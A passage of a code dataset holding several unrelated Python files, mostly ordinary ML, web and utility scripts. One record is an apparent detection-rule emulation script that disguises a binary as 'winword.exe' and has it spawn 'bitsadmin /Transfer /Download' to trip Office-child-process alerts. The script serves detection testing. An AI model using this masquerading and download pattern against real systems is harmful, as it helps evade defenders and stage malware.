j in ['32', '33', '17', '22', '28']:\n f[i + '#' + j] = f[i] * f['COM_CAT#' + j]\nf = f.join(c)\nf['INTERNET_TYPE_ID']\nf = f.reindex(['CSI'] + list([a for a in f.columns if a != 'CSI']), axis=1)\nf = pd.get_dummies(f, columns=['BASE_TYPE','ACT', 
'COM_CAT#26'])\nf.corr().style.background_gradient()","repo_name":"vasste/py-competitions","sub_path":"mlbootcamp/telecom/woe_iv.py","file_name":"woe_iv.py","file_ext":"py","file_size_in_byte":2765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"200777863","text":"from skimage.color import rgb2gray\nimport numpy as np\nfrom openslide import open_slide, __library_version__ as openslide_version\nfrom typing import Dict\nimport matplotlib.pyplot as plt\nimport os\nfrom tqdm import tqdm\nfrom typing import Dict,Tuple\nimport argparse\nfrom PIL import Image\nimport re\nimport time\nos.chdir(\"C:\\\\Users\\\\aroni\\\\Documents\\\\adl-f22\\\\adl-fall2022-prj\")\nfrom doc.core.utils import custom_logger\n\ndef read_slide(slide, pos, level, dimension, as_float=False):\n im = slide.read_region(pos, level, dimension)\n im = im.convert('RGB') # drop the alpha channel\n if as_float:\n im = np.asarray(im, dtype=np.float32)\n else:\n im = np.asarray(im)\n return im\n\nclass SlideWindow:\n\n def __init__(self,\n slide,\n tumor_mask,\n windows_dim : Tuple[int],\n level : int,\n stride : int,\n threshold : Dict[str,int]\n ) -> None:\n self.slide = slide\n self.tumor_mask = tumor_mask\n self.windows_dim = windows_dim\n self.level = level\n self.stride = stride\n self.threshold = threshold\n level_dimension = slide.level_dimensions[level]\n tot_slide = read_slide(self.slide,np.array((0,0)),self.level,level_dimension)\n self.gray_slide = rgb2gray(tot_slide)\n self.windows =[\n (x,y) for y in range(0,level_dimension[1],stride) for x in range(0,level_dimension[0],stride)\n ]\n self.num_windows = len(self.windows)\n self.windows = iter(self.windows)\n\n \n def move_window(self):\n x,y = next(self.windows)\n pixels_in_window = self.gray_slide[y:(y+self.stride),x:(x+self.stride)]\n percentage_gray_pixel = np.mean(pixels_in_window<=self.threshold[\"gray\"])\n if percentage_gray_pixel>self.threshold[\"percentage_tissues\"]:\n self.pos = np.array((x,y)) + np.array((self.stride,self.stride))//2 - np.array(self.windows_dim)//2\n return True\n else :\n return False\n \n def get_zoomed_imgs(\n self,\n levels_zoom,\n patch_name,\n file\n )->Dict:\n for zoom in levels_zoom:\n self.zoomed_pos = self.pos + np.array(self.windows_dim)//2\n self.zoomed_pos -= np.array(self.windows_dim)//(2**(zoom+1))\n self.zoomed_pos = (self.zoomed_pos*(2**(self.level))).astype(\"int32\")\n img = read_slide(\n self.slide,\n self.zoomed_pos,\n self.level-zoom,\n self.windows_dim\n )\n img = Image.fromarray(img)\n dir_path = os.path.join(\"./data/patches\",\"zoom_x\"+str(2**zoom))\n if not os.path.exists(dir_path):\n os.mkdir(dir_path)\n file_name = os.path.join(dir_path,patch_name)\n img.save(file_name)\n mask_image = read_slide(\n self.tumor_mask,\n self.zoomed_pos,\n self.level-zoom,\n self.windows_dim\n )\n mask_image = mask_image[:,:,0]\n file.write(file_name+\",\")\n file.write(str(int((mask_image>0).any()))+\"\\n\")\n\n \ndef build_training_patches(logger,slide_name,tumor_mask_name,args,file):\n logger.info(f\"Building the training patches for the slide {slide_name}\")\n slide_path = os.path.join('./data',slide_name) # only this file is available\n tumor_mask_path = os.path.join('./data', tumor_mask_name) # only this file is available\n\n slide_url = 'https://storage.googleapis.com/adl2022-slides/%s' % slide_name\n mask_url = 'https://storage.googleapis.com/adl2022-slides/%s' % tumor_mask_name\n\n # Download the whole slide image\n if not os.path.exists(slide_path):\n 
logger.info(f\"Missing slide downloading it from {slide_url}\")\n os.chdir(\"./data/\")\n os.system(f\"curl -O {slide_url}\")\n os.chdir(\"..\")\n\n # Download the tumor mask\n if not os.path.exists(tumor_mask_path):\n logger.info(f\"Missing mask slide downloading it from {mask_url}\")\n os.chdir(\"./data/\")\n os.system(f\"curl -O {mask_url}\")\n os.chdir(\"..\")\n \n logger.info(\"Opening the slide/mask\")\n slide = open_slide(slide_path)\n tumor_mask = open_slide(tumor_mask_path)\n sw = SlideWindow(\n slide,\n tumor_mask,\n windows_dim=(args.window_size,args.window_size),\n level=args.level,\n stride=args.stride,\n threshold={\n \"gray\" : args.gray_threshold,\n \"percentage_tissues\" : args.pixel_threshold\n }\n )\n num_patches_extracted = 0\n t = time.time()\n with tqdm(range(sw.num_windows),leave=False) as p_bar:\n for i in p_bar:\n if sw.move_window():\n sw.get_zoomed_imgs(\n args.number_of_zooms,\n \"_\".join([re.sub(\".tif\",\"\",slide_name),str(i)])+\".jpg\",\n file\n )\n num_patches_extracted +=1\n logger.info(f\"Extracted {num_patches_extracted} from the slide {slide_name} took {round(time.time()-t)} seconds\")\n os.remove(slide_path)\n os.remove(tumor_mask_path)\n logger.info(\"Deleting from disk the downloaded slides\")\n\n\nif __name__ == \"__main__\":\n logger = custom_logger()\n parser = argparse.ArgumentParser(description=\"Build the number of patches from an input slide\")\n parser.add_argument('--number_of_zooms',type=int,nargs='+',default=[0,1,3])\n parser.add_argument('--slides',type=str,default=None,nargs='+')\n parser.add_argument('--window_size',type=int,default=299)\n parser.add_argument('--stride',type=int,default=32)\n parser.add_argument('--level',type=int,default=3)\n parser.add_argument('--gray_threshold',type=float,default=0.8)\n parser.add_argument('--pixel_threshold',type=float,default=0.2)\n args = parser.parse_args()\n if args.slides == None:\n with open(\"./data/slides_name.txt\",\"r\") as file:\n slides = file.read().splitlines()\n else :\n slides = args.slides\n with open(\"./data/patches_tumor_label.csv\",\"w\") as file:\n with tqdm(slides) as p_bar:\n p_bar.set_description(\"Slide extracted \")\n for slide in p_bar:\n slide_name = \"tumor_\"+slide+\".tif\"\n tumor_mask_name = \"tumor_\"+slide+\"_mask.tif\"\n build_training_patches(logger,slide_name,tumor_mask_name,args,file)\n\n\n ","repo_name":"clement-micol/adl-fall2022-prj","sub_path":"doc/core/sliding_window.py","file_name":"sliding_window.py","file_ext":"py","file_size_in_byte":6410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"2240631696","text":"import subprocess\nfrom pathlib import Path\nfrom . import common\nfrom . 
import RtaMetadata\n\n\nmetadata = RtaMetadata(\n uuid=\"e7a55d39-37b4-4f37-9519-3779b3c23bfa\",\n platforms=[\"windows\"],\n endpoint=[\n {\"rule_name\": \"Suspicious Bitsadmin Activity\", \"rule_id\": \"676ac66c-4899-498f-ae21-ed5620af5477\"},\n {\"rule_name\": \"Suspicious Microsoft Office Child Process\", \"rule_id\": \"c34a9dca-66cf-4283-944d-1800b28ae690\"},\n ],\n siem=[],\n techniques=[\"T1197\", \"T1566\"],\n)\n\nROOT_DIR = Path(__file__).parent\nEXE_FILE = common.get_path(\"bin\", \"renamed.exe\")\n\n\n@common.requires_os(*metadata.platforms)\ndef main():\n\n fake_word = ROOT_DIR / \"winword.exe\"\n common.log(f\"Copying {EXE_FILE} to {fake_word}\")\n common.copy_file(EXE_FILE, fake_word)\n\n command = subprocess.list2cmdline([\"bitsadmin.exe\", \"/Transfer\", \"/Download\"])\n common.execute([fake_word, \"/c\", command], timeout=15, kill=True)\n common.execute([\"taskkill\", \"/f\", \"/im\", \"bitsadmin.exe\"])\n\n common.remove_files(fake_word)\n\n\nif __name__ == \"__main__\":\n exit(main())\n","repo_name":"elastic/detection-rules","sub_path":"rta/bitsadmin_execution.py","file_name":"bitsadmin_execution.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":1654,"dataset":"github-code","pt":"63"} +{"seq_id":"37786321247","text":"with open('english_words_upper_cleaner.txt', 'r') as f:\n words = f.read().splitlines()\n\nwith open('dictionary.js', 'w') as f:\n f.write('const dictionary = [\\n')\n for i, word in enumerate(words):\n if len(word) <= 10 and len(word) >= 3:\n if i == len(words) - 1:\n f.write(f' \"{word}\"\\n')\n else:\n f.write(f' \"{word}\",\\n')\n f.write('];\\n')\n","repo_name":"TaoseefAziz/Wordtris","sub_path":"auxiliary/words_to_js.py","file_name":"words_to_js.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"5102877738","text":"import argparse\nfrom collections import defaultdict\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"file\")\nparser.add_argument(\"splits\")\nargs = parser.parse_args()\n\n\ndef write_file(f_out, sentences):\n for sentence in sentences:\n for line in sentence.split('\\n'):\n f_out.write(' '.join(line.split()[1:]))\n f_out.write('\\n')\n f_out.write('\\n')\n\ntrain_ids = set()\ntest_ids = set()\ndev_ids = set()\n\nwith open(args.splits + '.train', 'r') as f_in:\n for line in f_in:\n train_ids.add(line.strip())\n\nwith open(args.splits + '.test', 'r') as f_in:\n for line in f_in:\n test_ids.add(line.strip())\n\nwith open(args.splits + '.dev', 'r') as f_in:\n for line in f_in:\n dev_ids.add(line.strip())\n\ntrain_ids = sorted(train_ids)\ntest_ids = sorted(test_ids)\ndev_ids = sorted(dev_ids)\n\nwith open(args.file, 'r') as f_in:\n text = f_in.read()\n sentences = [x.strip() for x in text.split('\\n\\n') if x.split()]\n sentences_per_doc = defaultdict(list)\n for sentence in sentences:\n doc_id = sentence.split()[0]\n sentences_per_doc[doc_id].append(sentence)\n\n train = []\n test = []\n dev = []\n\n for doc_id in train_ids:\n if len(sentences_per_doc[doc_id]) > 0:\n train += [\"0 -DOCSTART- X X O\"] # add dummy id as first column will be removed\n train += sentences_per_doc[doc_id]\n\n for doc_id in test_ids:\n if len(sentences_per_doc[doc_id]) > 0:\n test += [\"0 -DOCSTART- X X O\"]\n test += sentences_per_doc[doc_id]\n\n for doc_id in dev_ids:\n if len(sentences_per_doc[doc_id]) > 0:\n dev += [\"0 -DOCSTART- X X O\"]\n dev += sentences_per_doc[doc_id]\n\n with 
open(args.file+'.train', 'w') as f_out:\n write_file(f_out, train)\n with open(args.file+'.dev', 'w') as f_out:\n write_file(f_out, dev)\n with open(args.file+'.test', 'w') as f_out:\n write_file(f_out, test)\n","repo_name":"miladnouriezade/HUNER-evaluation","sub_path":"huner/ner_scripts/scripts/split_corpora.py","file_name":"split_corpora.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"39645512059","text":"import yfinance, utils\nimport pandas as pd\n\nutils.http.enableLogger()\nutils.http.enableCache()\n\npd.options.mode.chained_assignment = None # default='warn'\ncache = {}\n\ndef get(ticker='AAPL', period='100y', start=None, end=None, fromCache=True):\n if fromCache and ticker in cache:\n return cache.get(ticker)\n\n company = yfinance.Ticker(ticker)\n cache[ticker] = company.history(period=period, start=start, end=end)\n return cache[ticker]\n\n\ndef getByDate(ticker, date):\n try:\n df = get(ticker)\n return df.iloc[df.index.get_loc(date, method='pad')]\n except KeyError:\n return\n\n\ndef getDateIndex(history, date):\n return history.index.get_loc(date)","repo_name":"sanprojects/stocksStrategyTester","sub_path":"history.py","file_name":"history.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"11986916085","text":"import logging\nimport typing as t\n\nfrom components.application.uc_base import UseCaseBase\nfrom components.application.uc_request import GenericUseCaseRequest\nfrom components.application.uc_response import (\n GenericUseCaseResponse,\n UseCaseErrorResponse,\n UseCaseResponseStatus,\n)\nfrom components.domain.activity_type import ActivityType\nfrom components.domain.compensation_request import CompensationRequest\nfrom components.domain.project import Project\nfrom components.domain.repository_interfaces.activity_types_interface import (\n ActivityTypesRepositoryProtocol,\n)\nfrom components.domain.repository_interfaces.compensation_requests_interface import (\n CompensationRequestDTO,\n CompensationRequestsRepositoryProtocol,\n)\nfrom components.domain.repository_interfaces.projects_interface import (\n ProjectsRepositoryProtocol,\n)\nfrom components.domain.repository_interfaces.trainers_interface import (\n TrainersRepositoryProtocol,\n)\nfrom components.domain.repository_interfaces.users_interface import (\n UsersRepositoryProtocol,\n)\nfrom components.domain.user import Trainer, User\n\n_logger = logging.getLogger(__name__)\n\n\nUseCaseRequest = GenericUseCaseRequest[None]\nUseCaseResponse = GenericUseCaseResponse[t.List[CompensationRequest]]\n\n\nclass GetCompensationRequests(UseCaseBase):\n Request = UseCaseRequest\n Response = UseCaseResponse\n\n def __init__(\n self,\n activity_types_sql_repository: ActivityTypesRepositoryProtocol,\n projects_sql_repository: ProjectsRepositoryProtocol,\n users_sql_repository: UsersRepositoryProtocol,\n trainers_sql_repository: TrainersRepositoryProtocol,\n compensation_requests_sql_repository: CompensationRequestsRepositoryProtocol,\n ):\n self.project_sql_repository = projects_sql_repository\n self.users_sql_repository = users_sql_repository\n self.trainers_sql_repository = trainers_sql_repository\n self.compensation_requests_sql_repository = compensation_requests_sql_repository\n self.activity_types_sql_repository = activity_types_sql_repository\n\n async def execute(\n self, request: UseCaseRequest\n ) -> 
t.Union[UseCaseResponse, UseCaseErrorResponse]:\n _logger.info(\n f\"Processing GetCompensationRequests use case with request.data:{request.data}\"\n )\n\n compensation_requests: t.List[\n CompensationRequestDTO\n ] = await self.compensation_requests_sql_repository.get_compensation_requests()\n\n user_ids = set()\n trainer_ids = set()\n project_ids = set()\n for r in compensation_requests:\n user_ids.add(r.created_by_id)\n if r.request_initiator_id:\n user_ids.add(r.request_initiator_id)\n trainer_ids.add(r.trainer_id)\n project_ids.add(r.project_id)\n\n users: t.List[User] = await self.users_sql_repository.get_users(\n user_ids=list(user_ids)\n )\n trainers: t.List[Trainer] = await self.trainers_sql_repository.get_trainers(\n trainer_ids=list(trainer_ids)\n )\n projects: t.List[Project] = await self.project_sql_repository.get_projects(\n project_ids=list(project_ids)\n )\n activity_types: t.List[\n ActivityType\n ] = await self.activity_types_sql_repository.get_activity_types()\n\n project_id_to_project: t.Dict[int, Project] = {\n project.id: project for project in projects\n }\n\n trainer_id_to_trainer: t.Dict[int, Trainer] = {\n trainer.id: trainer for trainer in trainers\n }\n\n activity_type_id_to_name: t.Dict[int, str] = {\n activity_type.id: activity_type.name for activity_type in activity_types\n }\n\n user_id_to_user: t.Dict[int, User] = {user.id: user for user in users}\n result = []\n for r in compensation_requests:\n result.append(\n CompensationRequest(\n id=r.id,\n status=r.status,\n created_by=user_id_to_user[r.created_by_id],\n trainer=trainer_id_to_trainer[r.trainer_id],\n project=project_id_to_project[r.project_id],\n training_type=r.training_type,\n request_initiator=user_id_to_user[r.request_initiator_id]\n if r.request_initiator_id\n else None,\n created_at_ts=r.created_at_ts,\n activity_date=r.activity_date,\n activity_type=activity_type_id_to_name[r.activity_type_id],\n is_rewarded=r.is_rewarded,\n course_id=r.course_id,\n rd_point=r.rd_point,\n skill=r.skill,\n )\n )\n\n return self.Response.build(status=UseCaseResponseStatus.SUCCESS, data=result)\n","repo_name":"prernadubey/contribution_tool","sub_path":"components/application/get_compensation_requests.py","file_name":"get_compensation_requests.py","file_ext":"py","file_size_in_byte":4894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"74316720196","text":"from OpenGL.GL import *\nfrom OpenGL.GLU import *\nfrom OpenGL.GLUT import *\nimport sys\nfrom numpy import pi, sin, cos\n\nstate = [0.8, -0.95, pi/2]\nturn = pi/8\nmoves = 'LFRFRSRFLFLPLSLFRFRFP'\nmax_depth = 3\nF = [2/84]*2\n# L - Left\n# R - Right\n# F - Front\n# S - Save(Push)\n# P - Pop\n\ndef action(cur_depth):\n global state\n tmp = None\n if cur_depth != 1:\n for symbol in moves:\n if symbol == 'F':\n if cur_depth == max_depth:\n glVertex2f(state[0], state[1])\n glVertex2f(state[0]+F[0]*cos(state[2]), state[1]+F[1]*sin(state[2]))\n state = [state[0]+F[0]*cos(state[2]), state[1]+F[1]*sin(state[2]), state[2]]\n else:\n action(cur_depth+1)\n elif symbol == 'L':\n # print(state)\n state[2] += turn\n elif symbol == 'R':\n # print(state)\n state[2] -= turn\n elif symbol == 'S':\n tmp = state.copy()\n elif symbol == 'P':\n if not (tmp is None):\n state = tmp.copy()\n else:\n raise ValueError(\"tmp state is None\")\n\n else:\n if max_depth == 1:\n glVertex2f(state[0], state[1])\n glVertex2f(state[0]+F[0]*cos(state[2]), state[1]+F[1]*sin(state[2]))\n print('this way')\n else:\n 
action(cur_depth+1)\n\n\ndef display():\n glClearColor(255, 255, 255, 1)\n glClear(GL_COLOR_BUFFER_BIT)\n glColor4f(255,0,0,1.0)\n glBegin(GL_LINES)\n action(1)\n glEnd()\n glFinish()\n\n\ndef keyboard(key, x, y):\n ESCAPE = '\\027'\n if key == ESCAPE:\n exit(0)\n\n\nif __name__ == '__main__':\n win_size = [933, 700]\n glutInit(sys.argv)\n glutInitDisplayMode(GLUT_RGBA)\n glutInitWindowSize(*win_size)\n glutInitWindowPosition(100, 0)\n glutCreateWindow(\"test\")\n glutDisplayFunc(display)\n glutKeyboardFunc(keyboard)\n\n glutMainLoop()\n","repo_name":"cherowl/graphics","sub_path":"lab_3/bush.py","file_name":"bush.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"12560120109","text":"from openpyxl import load_workbook\nimport pandas as pd\n\n\ndef write_logs_to_excel(time, user, user_id, text, answer):\n writer = pd.ExcelWriter('logs.xlsx', engine='openpyxl')\n wb = load_workbook('logs.xlsx')\n ws = wb[\"Sheet\"]\n\n df_new_u = pd.DataFrame({\"user\": [user]})\n df_new_uid = pd.DataFrame({\"user_id\": [user_id]})\n df_new_time = pd.DataFrame({\"time\": [time]})\n df_new_ut = pd.DataFrame({\"user_text\": [text]})\n df_new_ba = pd.DataFrame({\"bot_answer\": [answer]})\n\n for index, row in df_new_u.iterrows():\n cell = \"A%d\" % (index + 2)\n ws[cell] = row[0]\n\n for index, row in df_new_uid.iterrows():\n cell = \"B%d\" % (index + 2)\n ws[cell] = row[0]\n\n for index, row in df_new_time.iterrows():\n cell = \"C%d\" % (index + 2)\n ws[cell] = row[0]\n\n for index, row in df_new_ut.iterrows():\n cell = \"D%d\" % (index + 2)\n ws[cell] = row[0]\n\n for index, row in df_new_ba.iterrows():\n cell = \"E%d\" % (index + 2)\n ws[cell] = row[0]\n\n wb.save(\"logs.xlsx\")\n print(\"log saved...\")\n\n\ndef log(message, answer):\n from datetime import datetime\n time = str(datetime.now())\n user = str(message.from_user.first_name)\n user_id = str(message.from_user.id)\n text = str(message.text)\n bot_answer = str(answer)\n write_logs_to_excel(time, user, user_id, text, bot_answer)\n","repo_name":"aekrops/python-telegram-bot","sub_path":"utils/logs.py","file_name":"logs.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"29662717620","text":"import csv, pathlib, os\n\nclass Storage():\n\n def __init__(self):\n self.save_path = './csv/'\n\n # Saves the values from the trainig runs and the calculated validation accuracy to a csv file.\n # @optimizer_name Name of the selected optimizer. Necessaray to load the correct file. \n # @kind specifies the save file string either to training or validation.\n # @data_to_save what kind of data to be saved: training_loss or validation accuracy\n def save_csv_file(self, optimizer_name, kind, data_to_save, batch_size):\n try:\n os.mkdir(self.save_path)\n except FileExistsError:\n pass\n with open(f'{self.save_path}{optimizer_name}_{kind}_{batch_size}.csv', 'a', newline='') as csv_validation:\n writer = csv.writer(csv_validation, delimiter=',')\n writer.writerow(data_to_save)\n data_to_save.clear()\n\n # Loads the saved training data csv file.\n # @optimizer_name Name of the selected optimizer. Necessaray to load the correct file.\n # @kind specifies the save file string either to training or validation. 
\n    # @return a list for each row in the csv file, number of lists\n    def load_loss_csv(self, optimizer_name, kind, batch_size): \n        loss_list = [] \n        number_of_lists = 0\n        try:\n            with open(f'{self.save_path}{optimizer_name}_{kind}_{batch_size}.csv', newline='') as csv_loss:\n                loss = csv.reader(csv_loss, delimiter=',', quoting=csv.QUOTE_NONNUMERIC) \n                data_list = []\n                for row in loss:\n                    data_list.append(row)\n                    number_of_lists += 1\n                loss_list.append(data_list) \n        except FileNotFoundError:\n            print('File not found.')\n        return loss_list, number_of_lists\n\n    # Loads the saved validation data csv file.\n    # @optimizer_name Name of the selected optimizer. Necessary to load the correct file.\n    # @kind specifies the save file string either to training or validation.\n    # @return a list of all measured accuracies.\n    def load_accuracy_csv(self, optimizer_name, kind, batch_size):\n        validation_list = []\n        try:\n            with open(f'{self.save_path}{optimizer_name}_{kind}_{batch_size}.csv', newline='') as csv_validation:\n                validation = csv.reader(csv_validation, delimiter=',', quoting=csv.QUOTE_NONNUMERIC)\n                for row in validation:\n                    validation_list.append(row)\n        except FileNotFoundError:\n            print('File not found.') \n        return validation_list\n","repo_name":"Telespielstube/benchmarker","sub_path":"storage.py","file_name":"storage.py","file_ext":"py","file_size_in_byte":2714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"37604012042","text":"from source.config import CV_BOOTSTRAP_FRACTION\nfrom source.stability.base_stability_analyzer import BaseStabilityAnalyzer\n\n\nclass IncrementalStabilityAnalyzer(BaseStabilityAnalyzer):\n    def __init__(self, base_model, base_model_name, train_pd_dataset, test_pd_dataset, test_y_true,\n                 dataset_reader, dataset_name, n_estimators=100, prediction_mapping=None):\n        \"\"\"\n        :param n_estimators: a number of estimators in ensemble to measure evaluation_model stability\n        :param prediction_mapping: dict, used to map model predictions to final results.\n        For example, LogisticRegression always returns True or False values, but for stability measuring we need numbers\n        \"\"\"\n        super().__init__(base_model, base_model_name, CV_BOOTSTRAP_FRACTION,\n                         train_pd_dataset, dataset_reader(pd_dataset=test_pd_dataset),\n                         test_y_true, dataset_name, n_estimators)\n        self.__prediction_mapping = prediction_mapping\n        self.dataset_reader = dataset_reader\n\n    def _batch_predict(self, classifier, test_dataset):\n        predictions = []\n        for x, y_true in test_dataset:\n            y_pred = classifier.predict_one(x)\n            if self.__prediction_mapping is not None:\n                y_pred = self.__prediction_mapping[y_pred]\n            predictions.append(y_pred)\n\n        return predictions\n\n    def _batch_predict_proba(self, classifier, test_dataset):\n        predictions = []\n        for x, y_true in test_dataset:\n            y_pred = classifier.predict_proba_one(x)[0]\n            if self.__prediction_mapping is not None:\n                y_pred = self.__prediction_mapping[y_pred]\n            predictions.append(y_pred)\n\n        return predictions\n\n    def _fit_model(self, classifier, train_df):\n        train_dataset = self.dataset_reader(pd_dataset=train_df)\n        for x, y_true in train_dataset:\n            classifier.learn_one(x=x, y=y_true)\n\n        return classifier\n","repo_name":"denysgerasymuk799/Online-ML-Stability","sub_path":"source/stability/incremental_stability_analyzer.py","file_name":"incremental_stability_analyzer.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"}
+{"seq_id":"71272772999","text":"import datetime\nimport sys\n\nfrom flask import render_template, Blueprint\nfrom flask_login import current_user, login_required\n\nfrom core.utils import get_current_book\nfrom core.tables import Progress, Books, User\nfrom core.forms import ProgressForm\nfrom core.db import db\n\nprogress = Blueprint(\"progress\", __name__, url_prefix=\"/progress\")\n\n\n@progress.route(\"/\")\n@login_required\ndef progress_graph():\n return render_template(\"progress/progress.html\", book=get_current_book())\n\n\n@progress.route(\"/book/\")\n@login_required\ndef progress_data_handler(id):\n return render_template(\"progress/progress.html\", book=db.session.query(Books).filter_by(id=id).first())\n\n\n@progress.route(\"/update\", methods=[\"POST\"])\n@login_required\ndef progress_update():\n form = ProgressForm()\n\n if form.validate_on_submit():\n book_id = int(form.id.data)\n progress = int(form.progress.data)\n\n db.session.add(Progress(datetime.datetime.now(), book_id, int(current_user.id), progress))\n db.session.commit()\n return \"Weeeee, you have read \" + str(progress) + \"% of this book!\"\n\n return \"Something wrong\"\n\n\n@progress.route(\"/data/\")\n@login_required\ndef progress_book_handler(id):\n book = db.session.query(Books).filter_by(id=id).first()\n progress_data = []\n if not book:\n return render_template(\"plain_data.html\", progress_data=progress_data)\n\n users = {user.id : user.first_name for user in User.query.all()}\n progress_per_user = {user_id : [] for user_id in users}\n\n world_creation = datetime.datetime(1970, 1, 1)\n\n min_date = sys.maxsize\n for progress in Progress.query.filter_by(book_id=book.id).all():\n timestamp = int(1000 * (progress.timestamp - world_creation).total_seconds())\n progress_per_user[progress.user_id] += [[timestamp, progress.progress]]\n min_date = min(min_date, timestamp - 1000 * 24 * 60 * 60)\n\n if min_date == sys.maxsize:\n progress_data = []\n else:\n progress_data = [{\"key\": users[id],\n \"values\": [[min_date, 0]] + progress_per_user[id]}\n for id in users]\n\n return render_template(\"plain_data.html\", data=progress_data)\n","repo_name":"Ignotus/bookclub","sub_path":"routes/progress.py","file_name":"progress.py","file_ext":"py","file_size_in_byte":2203,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"62"} +{"seq_id":"29814729608","text":"import os.path as osp\nimport re\nfrom collections import defaultdict\n\nfrom valids import parser, main as valids_main\n\n\nTASK_TO_METRIC = {\n \"cola\": \"mcc\",\n \"qnli\": \"accuracy\",\n \"mrpc\": \"acc_and_f1\",\n \"rte\": \"accuracy\",\n \"sst_2\": \"accuracy\",\n \"mnli\": \"accuracy\",\n \"qqp\": \"acc_and_f1\",\n \"sts_b\": \"pearson_and_spearman\",\n}\nTASKS = [\"cola\", \"qnli\", \"mrpc\", \"rte\", \"sst_2\", \"mnli\", \"qqp\", \"sts_b\"]\n\n\ndef get_best_stat_str(task_vals, show_subdir):\n task_to_best_val = {}\n task_to_best_dir = {}\n for task, subdir_to_val in task_vals.items():\n task_to_best_val[task] = max(subdir_to_val.values())\n task_to_best_dir[task] = max(subdir_to_val.keys(), key=lambda x: subdir_to_val[x])\n\n # import pdb; pdb.set_trace()\n N1 = len(task_to_best_val)\n N2 = len([k for k in task_to_best_val if k != \"rte\"])\n avg1 = sum(task_to_best_val.values()) / N1\n avg2 = sum(v for task, v in task_to_best_val.items() if task != \"rte\") / N2\n\n try:\n msg = \"\"\n for task in TASKS:\n dir = task_to_best_dir.get(task, 'null')\n val = task_to_best_val.get(task, -100)\n msg += f\"({dir}, 
{val})\\t\" if show_subdir else f\"{val}\\t\"\n msg += f\"{avg1:.2f}\\t{avg2:.2f}\"\n except Exception as e:\n msg = str(e)\n msg += str(sorted(task_vals.items()))\n return msg\n\ndef get_all_stat_str(task_vals):\n msg = \"\"\n for task in [task for task in TASKS if task in task_vals]:\n msg += f\"=== {task}\\n\"\n for subdir in sorted(task_vals[task].keys()):\n msg += f\"\\t{subdir}\\t{task_vals[task][subdir]}\\n\"\n return msg\n\ndef get_tabular_stat_str(task_vals):\n \"\"\"assume subdir is /run_*/0\"\"\"\n msg = \"\"\n for task in [task for task in TASKS if task in task_vals]:\n msg += f\"=== {task}\\n\"\n param_to_runs = defaultdict(dict)\n for subdir in task_vals[task]:\n match = re.match(\"(.*)/(run_.*)/0\", subdir)\n assert match, \"subdir\"\n param, run = match.groups()\n param_to_runs[param][run] = task_vals[task][subdir]\n params = sorted(param_to_runs, key=lambda x: float(x))\n runs = sorted(set(run for runs in param_to_runs.values() for run in runs))\n msg += (\"runs:\" + \"\\t\".join(runs) + \"\\n\")\n msg += (\"params:\" + \"\\t\".join(params) + \"\\n\")\n for param in params:\n msg += \"\\t\".join([str(param_to_runs[param].get(run, None)) for run in runs])\n msg += \"\\n\"\n # for subdir in sorted(task_vals[task].keys()):\n # msg += f\"\\t{subdir}\\t{task_vals[task][subdir]}\\n\"\n return msg\n\n \n\ndef main():\n parser.add_argument(\"--show_glue\", action=\"store_true\", help=\"show glue metric for each task instead of accuracy\")\n parser.add_argument(\"--print_mode\", default=\"best\", help=\"best|all|tabular\")\n parser.add_argument(\"--show_subdir\", action=\"store_true\", help=\"print the subdir that has the best results for each run\")\n parser.add_argument(\"--override_target\", default=\"valid_accuracy\", help=\"override target\")\n\n args = parser.parse_args()\n args.target = args.override_target\n args.best_biggest = True\n args.best = True\n args.last = 0\n args.path_contains = None\n \n res = valids_main(args, print_output=False)\n grouped_acc = {}\n grouped_met = {} # use official metric for each task\n for path, v in res.items():\n path = \"/\".join([args.base, path])\n path = re.sub(\"//*\", \"/\", path)\n match = re.match(\"(.*)finetune[^/]*/([^/]*)/(.*)\", path)\n if not match:\n continue\n run, task, subdir = match.groups()\n\n if run not in grouped_acc:\n grouped_acc[run] = {}\n grouped_met[run] = {}\n if task not in grouped_acc[run]:\n grouped_acc[run][task] = {}\n grouped_met[run][task] = {}\n\n if v is not None:\n grouped_acc[run][task][subdir] = float(v.get(\"valid_accuracy\", -100))\n grouped_met[run][task][subdir] = float(v.get(f\"valid_{TASK_TO_METRIC[task]}\", -100))\n else:\n print(f\"{path} has None return\")\n\n header = \"\\t\".join(TASKS)\n for run in sorted(grouped_acc):\n print(run)\n if args.print_mode == \"all\":\n if args.show_glue:\n print(\"===== GLUE =====\")\n print(get_all_stat_str(grouped_met[run]))\n else:\n print(\"===== ACC =====\")\n print(get_all_stat_str(grouped_acc[run]))\n elif args.print_mode == \"best\":\n print(f\" {header}\")\n if args.show_glue:\n print(f\"GLEU: {get_best_stat_str(grouped_met[run], args.show_subdir)}\")\n else:\n print(f\"ACC: {get_best_stat_str(grouped_acc[run], args.show_subdir)}\")\n elif args.print_mode == \"tabular\":\n if args.show_glue:\n print(\"===== GLUE =====\")\n print(get_tabular_stat_str(grouped_met[run]))\n else:\n print(\"===== ACC =====\")\n print(get_tabular_stat_str(grouped_acc[run]))\n else:\n raise ValueError(args.print_mode)\n print()\n\nif __name__ == \"__main__\":\n 
